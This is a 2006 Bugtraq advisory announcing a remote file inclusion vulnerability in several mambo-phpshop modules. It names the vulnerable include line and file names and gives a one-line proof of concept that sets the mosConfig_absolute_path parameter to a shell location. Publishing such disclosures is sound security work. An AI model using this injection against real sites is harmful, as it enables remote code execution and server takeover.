Bugtraq mailing list archives
mambo-phphop Product Scroller Module R.F.I
From: Outlaw () aria-security net
Date: 18 Aug 2006 04:29:06 -0000
########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: mambo-phphop Product Scroller Module #Attack method: Remote File Inclusion #Source: /* Load the phpshop main parse code */ require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' ); ************************************************************************************ #Vulnarable Files: mod_phpshop.php mod_phpshop_allinone.php mod_phpshop_cart.php mod_phpshop_featureprod.php mod_phpshop_latestprod.php mod_product_categories.php mod_productscroller.php mosproductsnap.php #Proof of Concept: #one of the files above.php?mosConfig_absolute_path=SHELL # #---------------------------------------------------------- # # #Contact : Outlaw () aria-security net
Current thread:
- mambo-phphop Product Scroller Module R.F.I Outlaw (Aug 18)
- Re: mambo-phphop Product Scroller Module R.F.I Carsten Eilers (Aug 22)